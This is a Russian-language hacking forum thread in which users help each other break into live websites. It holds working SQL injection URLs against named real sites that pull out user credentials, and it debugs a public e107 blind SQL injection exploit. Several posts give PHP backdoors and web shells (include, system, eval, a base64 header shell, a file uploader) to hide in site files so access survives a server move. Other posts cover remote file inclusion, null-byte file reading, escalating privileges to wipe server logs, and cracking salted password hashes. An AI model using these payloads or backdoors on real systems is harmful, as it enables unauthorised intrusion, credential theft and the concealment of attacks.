А ты уверен что под маздаем сидишь? Может ты под FreeBSD, и пытаешься выполнить виндовые команды ))
Ну если команды не работают а файл надо залить, то заливай так же, как залил шелл.
Нет! Мне нужно именно через CMD
CMD работает (то есть просмотр директорий доступен и т.п.)
А так же интересует как скачать файл
Pashkela
09.11.2008, 03:52
в своем виндоуз:
пуск-выполнить-cmd-help
Мне нужно именно через CMD
Просто через cmd никак ты не зальешь
Zinus вот когда я пишу в CMD "ftp"
То "FTP>" не высвечиваеться тама! вот в чем проблема
Значит скорее всего в папке windows/system32/ нет ftp.exe. Не судьба
Zinus а с провами тоже не как??? Или можно в окошечко CMD вывести то что в файле .php написано???
zifanchuck
09.11.2008, 12:19
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in.........
есть сайт. На нем нашел такую страничку. Что ето и как его использовать???
aka PSIH
09.11.2008, 12:27
Что ето и как его использовать???
это ошибка, кроме раскрытия путей нечего не даст...
Просто через cmd никак ты не зальешь
>echo "<?include($_GET[w])?>" > /www/evil.php
можно в окошечко CMD вывести то что в файле .php написано???
>type dir/file.php
Что ето и как его использовать???
никак
Привет всем!
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
Вот что выдаёт:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 4
[+] Benchmark delay: 6
[-] Benchmarck delay too small compared to normal delay, increase it.
Я так понимаю, тут написано, что нужно увеличить задержку чего-то. А чего и как - хз. И можно ли вообще это как-то увеличить?
Pashkela
09.11.2008, 19:07
my $benchmark = 1000000; - наверное тут надо циферьку побольше поставить
или тупо во это вырезать:
if($bdelay - $ndelay < 4)
{
print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n";
exit ();
}
@diznt
я же тебе уже написал в прошлой теме, что так должно быть: при выполнении команды ftp пользователю предлагается ввести команды в консоли ftp. Я же писал выполни ftp /? узнаешь список команд. Если ты такой ленивый, то вот пример скачивания файла с удаленного ftp:
open ftp.someserver.com
user username password
ascii
cd /htdocs
get s.php
bye
затем сохраняешь это в файл ftp.txt и выполняешь команду в cmd:
ftp -n -s:C:\ftp.txt
В итоге ты скачаешь файл s.php с ftp-сервера под учетной записью пользователя username с паролем password
Или используй tftp, скачивай сервер по ссылке, которую я уже давал и запускай на своем компе, указав папку с доступными для скачивания файлами.
или тупо во это вырезать:
тогда сплоит работать не будет, время задержки сервера должно быть достаточно существенным, чтобы скрипт мог отличить правильный и неправильный запрос
а что это такое
<?include($_GET[w])?>
и как это использовать???))
а что это такое
<?include($_GET[w])?>
и как это использовать???))
php.su
diznt, как сказал слип - php.su конечно же поможет .. ну а вообще - инклудь шелл и будет тебе радость :D
есть язык программирования php.
в нем есть код.
в этом коде можно написать include($_GET[w]) и теперь при обращении к странице site.ru/index.php?w=http://ya.ru/shell.php мы можем использовать код из файла shell.php. Инклуд нужен, чтобы встраивать в код скрипта код из другого файла. как-то так) если не понял-пиши)
AFoST неа не пашет
пишу ***.com/test.php?w=http://z0u4.narod.ru/1.php
Не помогает... (даже если выбрать хост с поддержкой php)
Помогайте)
DimOnOID
10.11.2008, 00:37
AFoST неа не пашет
пишу ***.com/test.php?w=http://z0u4.narod.ru/1.php
Не помогает... (даже если выбрать хост с поддержкой php)
Помогайте)
инклудь тхт а не пхп...
DimOnOID не помогает... К сожелению покачто не могу дать ресурс где я все это делаю
глянь phpinfo() возможно отключен url_include; проверь url_fopen=on/off?
или попробуй так:
<form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
Привет всем!
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[-] Exploit mistake: please re-check benchmark
Я так понимаю, загвоздка где-то здесь:
for(my $j = 1; $j <= 32; $j++)
{
foreach $char(@cset)
{
info(chr($char), $hash, "password");
my ($pre_time, $post_time) = time();
$rv = check_char($char, $j, "user_password");
$post_time = time();
if($rv and ($post_time - $pre_time) > ($ndelay + 3))
{
$hash .= chr($char);
last;
}
}
last if $j != length($hash);
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
exit;
}
Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
...
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[+] You can try to login with this cookie:
[+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
length(d41d8cd98f00b204e9800998ecf8427e) = 32
Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
Так что же делать? как заставить скрипт работать? подскажите плиз, я в программировании не бум-бум.
Интересует как узнать пароль админа...
Имееться папка WINDOWS при себе
иши сам файл а потом бруть саминсайдом
http://ru.wikipedia.org/wiki/SAM
Imperou$
10.11.2008, 18:25
Братцы, выручайте!!!!
Есть некий сайт со sql inj, и вот такой запрос
http://www.site.com/list.php?cat=-41+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name/*
Все данные из таблицы table_name,все которые в ней есть, сразу выводятся на страницу.
Но во многих значение колонки summ10 пустое. Просто после данных из summ9 идёт :: и пусто.
Внимание, вопрос :-)
Как вывести только те данные, в которых значение summ10 не пустое? (их мало, но они есть). Каким запросом?
Выручайте, очень на вас расчитываю.
Imperou$
10.11.2008, 19:14
[Raz0r]
Извини, немного не понял.
Это будет выглядеть так?
...+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3 a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10=.../*
?
Покажи пожалуйста на примере запроса.
И ещё, summ10 имеет разные значения, разной длинны.
Например
1435
233
1645
и т.д.
Если использовать +where+summ10=.../*
то ведь необходимо указывать значение summ10.
Imperou$
10.11.2008, 20:01
where not summ10 = ""
Делаю +from+table_name+where+not+summ10=""/*
Ошибка. Не получается.
Если делать так
+from+customers+where+summ10=271/* (значение 271 присутсвует в summ10) то выводит поле со всеми данными этой таблицы. Но мне надо всех, где значение summ10 не пустое..
+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3 a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10+<>+0/*
Imperou$
10.11.2008, 20:09
[Raz0r]
Огромное спасибо! Вышло! =)
Очень признателен.
***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--
Ошибку выводит
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1
Число столбцов определил "order by"
Что делать не представляю
diznt попробуй вместо -- подставить /* или вообше там ниче неставь.А вообше кидай сюда линк на сайт если ниче страшного там нет , а люди посотрят что можно сделать :)
Вот линк собственно
http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid='&language=ru
Jokester
10.11.2008, 21:04
Вот линк собственно
http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid='&language=ru
Третья ветка
http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid=1'+and+substring(version(),1,1)=3/*&language=1
сорри. продублирую
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[-] Exploit mistake: please re-check benchmark
Я так понимаю, загвоздка где-то здесь:
for(my $j = 1; $j <= 32; $j++)
{
foreach $char(@cset)
{
info(chr($char), $hash, "password");
my ($pre_time, $post_time) = time();
$rv = check_char($char, $j, "user_password");
$post_time = time();
if($rv and ($post_time - $pre_time) > ($ndelay + 3))
{
$hash .= chr($char);
last;
}
}
last if $j != length($hash);
}
if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
exit;
}
Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
...
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 1
[+] Benchmark delay: 13
[+] Victim password: f
[+] You can try to login with this cookie:
[+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
Так что же делать? как заставить скрипт работать? подскажите плиз, я не бум-бум.
truelamer
10.11.2008, 22:11
почему не катит?:
http://www.ascon.kz/index.php?news=144+and+lower(substr((SELECT+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1 ))='c'
почему не катит?:
http://www.ascon.kz/index.php?news=144+and+lower(substr((SELECT+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1 ))='c'
гхм))
http://www.ascon.kz/index.php?news=-1+union+select+1,2,3,4,5,6/*
Jokester
10.11.2008, 22:57
почему не катит?:
http://www.ascon.kz/index.php?news=144+and+lower(substr((SELECT+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1 ))='c'
А зачем изврат-то? Скуль вроде обычный.
Не катит потому, что ковычки фильтруются
Попробуй:
http://www.ascon.kz/index.php?news=144+union+select+1,2,3,'44',5,6/*
а вот так покатит, если нужен подзапрос:
http://www.ascon.kz/index.php?news=144+and+ascii(lower(substr((SELECT+ TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1, 1),1,1)))=99
99 это 'с' как ты понимаешь , тренируешься? :)
Flash-ICE
11.11.2008, 03:06
Народ нужна ваша помощь! Именно от вас зависит моя судьба!
И так имееться шелл, я могу ходить по всем папкам... нужно перезаписать или удалить в папке /logs файлы error.log и access.log
я не могу их просто так удалить или перезаписать то есть там стоят прова чтобы незя было записыватЬ! что делать?!
вытяни пароли из конфигов и попробуй их подставить к ФТП и ССХ
Flash-ICE
11.11.2008, 03:47
неа не подходит
Народ нужна ваша помощь! Именно от вас зависит моя судьба!
И так имееться шелл, я могу ходить по всем папкам... нужно перезаписать или удалить в папке /logs файлы error.log и access.log
я не могу их просто так удалить или перезаписать то есть там стоят прова чтобы незя было записыватЬ! что делать?!
сплоент под дырявые сервисы ищи (для поднятия прав в системе)-порутаешь серв, сможешь перзаписать... а вообще раньше ты чем думал? :(
ЗЫ читал тему в болталке... одмин уже небося патчеги накладывать тока успевает :confused:
Здраствуйте!
у меня вопрос
http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+6--
выдает страничку,
а http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+7--
ошибку.
Но запрос вида http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+union+select+1,2,3,4,5,6-- не работает.
Объясните чайнику :)
http://www.gamingtrend.com/PressReleases/index.php?PRID=-1%20union%20select%201,2,version(),4,5,6,7
дальше разберешься?
ЗЫ и вообще его уже захенкали http://forum.antichat.ru/showpost.php?p=594289&postcount=4856 (чет я сразу то не глянул :( )
Блин ЛЮДИИИ ПОМОГИТЕЕ!! Не знаю чё делать ващееееее.
https://forum.antichat.ru/showpost.php?p=935746&postcount=3618
truelamer
11.11.2008, 13:25
не работает сплоит, есть мыди почему?
cutenews 1.1.1 (strawbery)
http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
http://ava4me.ru/ Кто знает чтоза скрипт и где его взять?
-m0rgan-
11.11.2008, 14:26
http://www.gamingtrend.com/PressReleases/index.php?PRID=-1%20union%20select%201,2,version(),4,5,6,7
дальше разберешься?
ЗЫ и вообще его уже захенкали http://forum.antichat.ru/showpost.php?p=594289&postcount=4856 (чет я сразу то не глянул :( )
Ты по ссылке вапше ходил?
Там вапшет 32таблицы!
Я шяс с моба...буду за компом,запостю правильную линку...
Здравствуйте! )) :)
есть шелл на сервере (сервер 1), админы хотят перейти на сервер 2 и взять с собой туда лишь несколько PHP файлов.
Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере?
Спасибо! :)
Здраствуйте!
у меня вопрос
http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+6--
выдает страничку,
а http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+order+by+7--
ошибку.
Но запрос вида http://www.gamingtrend.com/GameInfo/GameInfo.php?GameID=7889+union+select+1,2,3,4,5,6-- не работает.
Объясните чайнику :)
вероятно в скрипте несколько sql-запросов с разным числом столбцов..а может еще что-то
а вот здесь все просто
http://www.gamingtrend.com/Reviews/review/review.php?ReviewID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2--
DimOnOID
11.11.2008, 18:50
Здравствуйте! )) :)
есть шелл на сервере (сервер 1), админы хотят перейти на сервер 2 и взять с собой туда лишь несколько PHP файлов.
Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере?
Спасибо! :)
system($_GET['d']);
или
include($_GET['s']);
а потом
site.ru/test.php?d=ls
site.ru/test.php?s=http://www.google.com/shell.txt
system($_GET['d']);
или
include($_GET['s']);
а потом
site.ru/test.php?d=ls
site.ru/test.php?s=http://www.google.com/shell.txt
спасибо!
они могут не-локальный include отключить
и отключить system
есть ещё варианты?
Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере?
http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
они могут не-локальный include отключить
и отключить system
тогда просто eval($_GET['c']); а потом уже разберешься, что отключено и как с этим бороться
не работает сплоит, есть мыди почему?
cutenews 1.1.1 (strawbery)
http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
может на сервере отключен register_globals? попробуй так:
http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${phpinfo()}}--%3E
DimOnOID
11.11.2008, 19:10
']http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
тогда просто eval($_GET['c']); а потом уже разберешься, что отключено и как с этим бороться
да ..а есчё можно как у сплойта от СМФ
if(isset($_SERVER['HTTP_SHELL'])) { print otake;eval(base64_decode($_SERVER['HTTP_SHELL']));print otake;exit(); }
а патом пасылать
GET http://site.ru/index.php HTTP/1.0
Host: www.site.ru
Prama: no-cache
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*
Shell: c3lzdGVtKCdscycpOw==
Например так...
Ты по ссылке вапше ходил?
Там вапшет 32таблицы!
Я шяс с моба...буду за компом,запостю правильную линку...
ты по моей ссылке вообще ходил? и вообще это боян (еще в 2007 году выкладывали данную скуль), так что не надо ля ля.
truelamer
11.11.2008, 20:26
http://www.medicinenet.com/script/main/art.asp?articlekey=47344+and+1=@@version--
Error converting data type varchar to int
как сделать чтоб типы совпали и я узнал версию?
truelamer
11.11.2008, 20:29
2Raz0r
А ты сам попробуй, у меня лично ни так ни так не работает
А ты сам попробуй, у меня лично ни так ни так не работает
значит версия двига в твоем случае отличается или стоит патч
http://www.medicinenet.com/script/main/art.asp?articlekey=47344+and+1=@@version--
SQL-инъекция в хранимой процедуре:
http://www.medicinenet.com/script/main/art.asp?articlekey=47344'--
К сожалению, не только подогнать тип данных не получится, но и вообще внедрить SQL-код.
Goodwin_
11.11.2008, 23:13
что можно сделать, если я могу перемещаться по каталогам с помощью скрипта и просматривать текстовые файлы с помощью скрипта на сайте
http://www.site/xxx/show.asp?doc=abc&dir=cba
если в doc писать например show.asp то пишет "нет запрашиваемой страницы"
если просто show то пишет " filename=bla\bla\bla\show.txt
файл не найден"
prescott
11.11.2008, 23:20
Есть сервер: http://formz.ru/
Судя по заголовкам работает на Server: CherryPy/3.0.1 (http://www.cherrypy.org/).
Судя по всему, опять же, есть sql-inj:
https://formz.ru/nb/public/faq/view?table.question_list.limit=[sql]
У кого есть идеи по продолжению? Поиск уязвимостей сервера по гуглу ничего путнего не дал. И как можно определить какая БД установлена на сайте?
что можно сделать, если я могу перемещаться по каталогам с помощью скрипта и просматривать текстовые файлы с помощью скрипта на сайте
http://www.site/xxx/show.asp?doc=abc&dir=cba
если в doc писать например show.asp то пишет "нет запрашиваемой страницы"
если просто show то пишет " filename=bla\bla\bla\show.txt
файл не найден"
нуллбайтом отсечь расширение и читать любые файлы:
http://www.site/xxx/show.asp?doc=abc&dir=cba.php%00
Здравствуйте я хотел бы поинтересоваться
как можно стянуть базу контент интерне магазина ?
она сохраняется в файле с росшерением .CSV
Но как её вытянуть от туда немогу понять.
http://www.sex-shop.ua/
Вот магазин помогите пожалуйста.
http://ava4me.ru/ Кто знает чтоза скрипт и где его взять?
prescott
12.11.2008, 09:27
Есть сервер: http://formz.ru/
Судя по заголовкам работает на Server: CherryPy/3.0.1 (http://www.cherrypy.org/).
Судя по всему, опять же, есть sql-inj:
https://formz.ru/nb/public/faq/view?table.question_list.limit=[sql]
У кого есть идеи по продолжению? Поиск уязвимостей сервера по гуглу ничего путнего не дал. И как можно определить какая БД установлена на сайте?
товарищи, неужели никто ничего не сможет сказать по этому субъекту?
Jokester
12.11.2008, 13:44
Судя по заголовкам работает на Server: CherryPy/3.0.1 .Да судя по ошибке так и естьСудя по всему, опять же, есть sql-inj:
https://formz.ru/nb/public/faq/view?table.question_list.limit=[sql]Это судя по чему? Я не увидел, и даже если-бы она там была, это limit, скорее всего после order by, а это дохлый номер
prescott
12.11.2008, 15:37
Это судя по чему? Я не увидел, и даже если-бы она там была, это limit, скорее всего после order by, а это дохлый номер
Судя по тому, что другие параметры на сайте интвалятся, а этот выдает критическую ошибку, хотя конечно не факт.
А вот про то что в лимит инъекция "дохлый номер" это ты совсем зря. Просто сервер БД видимо какой то редкий.
Jokester
12.11.2008, 15:56
А вот про то что в лимит инъекция "дохлый номер" это ты совсем зря. Просто сервер БД видимо какой то редкий.Вот инъекция в лимите
http://www.contactphoto.com/archive.php?search=&limit=1
Сдесь обычный мускул, ошибка выплёвывает весь запрос, что упрощает дело. Если это возможно, хотелось бы увидить реализацию
mishgan80
12.11.2008, 16:22
мужики помогите, где здесь админка - www.loretta.ru
мужики помогите, где здесь админка - www.loretta.ru
попробуй войти под администратором. там есть поля ввода. и там уже смотри, либо воспользуйся сканером, типо пельмешко и так далее.
mishgan80
12.11.2008, 16:46
хм.... я вытащил пароль юзера root, но он туда не подходит, туда подходят только пароли обычных пользователей что и навело меня на мысль об использовании другоо входа для администраторов
truelamer
12.11.2008, 18:19
2jokester
меня тоже интересует реализация инъекции после order и limit если таковая возможна.
если бы ордера не было то можно былобы union прикрутить, а так не получается. Есть идеи?
Jokester
12.11.2008, 18:26
2jokester
меня тоже интересует реализация инъекции после order и limit если таковая возможна.
если бы ордера не было то можно былобы union прикрутить, а так не получается. Есть идеи?
Лично мне о такой возможности ничего не известно (если это мускул разумеется), но как видишь уважаемый prescott хоть и косвенно, но дал понять, что это возможно.
Ну что-ж линк я дал, надеюсь увидеть реализацию.
truelamer
12.11.2008, 18:38
2jokester
А почему ругается при попытке завершить первый запрос ; ??
может он эти настройки сервера имел ввиду)
в mysql нельзя выполнять несколько запросов, разделяя их ;
truelamer
12.11.2008, 20:54
; если не ошибаюсь означает конец запроса, проправьте если ошибаюсь
в MySQL использовать UNION после ORDER нельзя:
SELECT 1 ORDER BY 1 LIMIT 1 UNION SELECT 1
->
Incorrect usage of UNION and ORDER BY
но просто с LIMIT можно:
SELECT 1 LIMIT 1 UNION SELECT 1;
->
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)
prescott
12.11.2008, 21:52
Лично мне о такой возможности ничего не известно (если это мускул разумеется), но как видишь уважаемый prescott хоть и косвенно, но дал понять, что это возможно.
Ну что-ж линк я дал, надеюсь увидеть реализацию.
Union использовать действительно нельзя, но:
select * from <table_name> order by 1 limit 0,5
Допустим 5 в лимите уязвимый параметр, пишем так:
http://site.ru/id=5*if(version='5.0.1т.д. и т.п.',1,2)
Получаем
select * from <table_name> order by 1 limit 0, 5*if(version='5.0.1т.д. и т.п.',1,2) Если вернуло пять записей - угадал версию, если десять - не угадал. Пишешь сплоит который перебирает посимвольно и дело в шляпе.
И подзапросы в mysql тоже никто не отменял кстати.
truelamer
12.11.2008, 21:58
2prescott и почему же тогда в данном случае не работает?
prescott
12.11.2008, 22:02
2prescott и почему же тогда в данном случае не работает?
Я думаю что в случае с formz.ru стоит другой сервер базы данных, поэтому и прошу помощи ачатовцев. С распространенными БД я сам могу в большинстве случаев справиться, тут просто какая то некандиция...
Например такой запрос прокатывает, следовательно ; для этой БД означает конец запроса, ошибки ведь не возникает, заметь!
http://formz.ru/nb/public/faq/view?table.question_list.limit=2;%20select%201--
А если вместо точки с запятой поставить например дефис, вылетает критическая ошибка.
truelamer
12.11.2008, 22:04
2prescott
почему тут не получается? вроде все как ты описывал, помоги разобраться
http://www.contactphoto.com/archive.php?search=&limit=1
вроде тогда один из двух вариантов должен был сработать
http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(version(),1,1))=34,1,2)/*
или
http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(version(),1,1))=35,1,2)/*
@prescott
подзапросы после лимита или в его аргументе нельзя использовать, можно только добавить UNION SELECT и то при условии, что перед лимитом нет ORDER BY
Если вернуло пять записей - угадал версию, если десять - не угадал. Пишешь сплоит который перебирает посимвольно и дело в шляпе.
не будет так работать, даже такой запрос возвращает ошибку:
select 1 order by 1 limit 1,5*1;
prescott
12.11.2008, 22:11
2prescott
почему тут не получается? вроде все как ты описывал, помоги разобраться
http://www.contactphoto.com/archive.php?search=&limit=1
вроде тогда один из двух вариантов должен был сработать
http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(version(),1,1))=34,1,2)/*
или
http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(version(),1,1))=35,1,2)/*
Потомучто это не mysql и не mssql, ибо запрос http://www.contactphoto.com/archive.php?search=&limit=1,2-- ругается на --, что для них должно однозначно трактоваться как комментарий.
UPD: был не прав, ошибка пишет что это действительно mysql...
truelamer
12.11.2008, 22:13
это не mssql
тема закрыта, если есть order by то можно не расчитывать на иньекцию.
Потомучто это не mysql и не mssql, ибо запрос http://www.contactphoto.com/archive.php?search=&limit=1,2-- ругается на --, что для них должно однозначно трактоваться как комментарий.
бред, ты хоть в ошибки смотри это MySQL. Насчет --, уже сотый раз говорю, что в MySQL нужно ставить пробел после него
http://www.contactphoto.com/archive.php?search=&limit=1,2--%20
prescott
12.11.2008, 22:25
это не mssql
тема закрыта, если есть order by то можно не расчитывать на иньекцию.
кстати, если тебе всетаки нужен тот сайт, то инъекция есть тут, да и крутится легко:
http://www.contactphoto.com/view.php?sec=programs&eventid=1290+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4/*
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,column_name ),2,3,4,5,6,7,8+from+information_schema.columns/* - пишет, что табла users есть
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+users/* - пишет ошибку... в чем проблема
truelamer
12.11.2008, 22:27
2prescott
спасибо, меня интересовала исключительно идея скулы после limit с order by
prescott
12.11.2008, 22:30
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,column_name ),2,3,4,5,6,7,8+from+information_schema.columns/* - пишет, что табла users есть
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+users/* - пишет ошибку... в чем проблема
Потомучто таблица в другой базе. Смотри так:
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,table_schem a ),2,3,4,5,6,7,8+from+information_schema.columns/*
Она принадлежит базе test, вот запрос:
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+test.u sers/*
пишет ошибку... в чем проблема
потому что таблица users в другой базе данных
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(username,0x3a,password),2,3 ,4,5,6,7,8+from+test.users/*
опередили...
truelamer
12.11.2008, 22:47
чем расшифровать пасы от джумлы, подскажите чего-нить особо эффективное)
sotramxan:bffc841658e3eb534f41915454d2cd6b:mLvhGI5 BGHOuIKq7:sotramxan@sotramxan.com
:{-VaigeR-}:
12.11.2008, 22:56
чем расшифровать пасы от джумлы, подскажите чего-нить особо эффективное)
sotramxan:bffc841658e3eb534f41915454d2cd6b:mLvhGI5 BGHOuIKq7:sotramxan@sotramxan.com
У лебедя попробуй, хешкрякинг рулит! Я вот сча не помню где-то видел короче написали програму которая хеши брутит через видюху, правда там ни все поддерживает видеокарты, но говорят скорость брута мега супер! Попробую сча найти!
ЗЫ Нашел, на держи - http://forum.insidepro.com/viewtopic.php?t=1983
truelamer
12.11.2008, 23:04
У лебедя попробуй, хешкрякинг рулит!
если ты не заметил то тут джумла с солью и hashcracking.info не поможет
http://www.ascmfoot.freesurf.fr/joueur.php3?idj=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23/* - помогите найти таблицы, пожалуйста)) а лучше посоветуйте прогу для подбора таблиц по словорю,а то что-то найти не могу((
http://www.ascmfoot.freesurf.fr/joueur.php3?idj=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23/* - помогите найти таблицы, пожалуйста)) а лучше посоветуйте прогу для подбора таблиц по словорю,а то что-то найти не могу((
sipt к примеру :)
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' - не помню, как обойти(( помогите, пожалуйста!!!
Red_Red1
13.11.2008, 03:05
SELECT ..... UNHEX(HEX(pole).... FROM ...
если ты не заметил то тут джумла с солью и hashcracking.info не поможет
Онлайн ломалку не найдешь, юзай брутеры с алгоритмом md5($pass.$sault) к примеру passwordspro
Здравствуйте! :)
Подскажите,
есть код внедренный в .php файл на сервере:
if(isset($_REQUEST['act']) and isset($_REQUEST['id4']) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']);
подскажите, как его правильно использовать?
Т.е. как правильно передать несколько строк php в него, чтобы они выполнились?
Спасибо! :)
9()K_t()R
13.11.2008, 12:29
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' - не помню, как обойти(( помогите, пожалуйста!!!
1+union+select+convert(pole)+using+latin1),+from+t able/*
9()K_t()R
13.11.2008, 12:32
Здравствуйте! :)
Подскажите,
есть код внедренный в .php файл на сервере:
if(isset($_REQUEST['act']) and isset($_REQUEST['id4']) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']);
подскажите, как его правильно использовать?
Т.е. как правильно передать несколько строк php в него, чтобы они выполнились?
Спасибо! :)
index.php?id4=123&act=phpinfo();
index.php?id4=123&act=phpinfo();
or
index.php?act=123&id4=phpinfo();
работает! :)
php_inj.php?id4=5567&act=phpinfo();
if(isset($_REQUEST['act']) and isset($_REQUEST['id4'])) preg_replace("/55/e",$_REQUEST['act'],$_REQUEST['id4']);
а какой код нужен, чтобы шелл залить?
fervex
'<?system($_GET[cmd]);?>'
Можешь захексить (ну и если с кавычками в порядке)
потом обращаешься к нему
/shell.php?cmd=ls -la
Только найди диреторию drwxrwxrwx =) temp or tmp search
Есть у меня доступ к MSSQL на одном сайте. По началу мне казалось, что сайт лежит на этом же сервере. Перерыл все и не нашел )) Только потом до меня доперло, что sql server и web сервер - это разные физические сервера.
Доступ у меня через бажный скрипт (index.asp?id=-1' такого рода), права dbo, комманды исполняются на ура.
Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
truelamer
13.11.2008, 19:10
Есть у меня доступ к MSSQL на одном сайте. По началу мне казалось, что сайт лежит на этом же сервере. Перерыл все и не нашел )) Только потом до меня доперло, что sql server и web сервер - это разные физические сервера.
Доступ у меня через бажный скрипт (index.asp?id=-1' такого рода), права dbo, комманды исполняются на ура.
Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
помотри можно-ли выполнить консольные команды, если можно то настрой firewall и пингани себя.
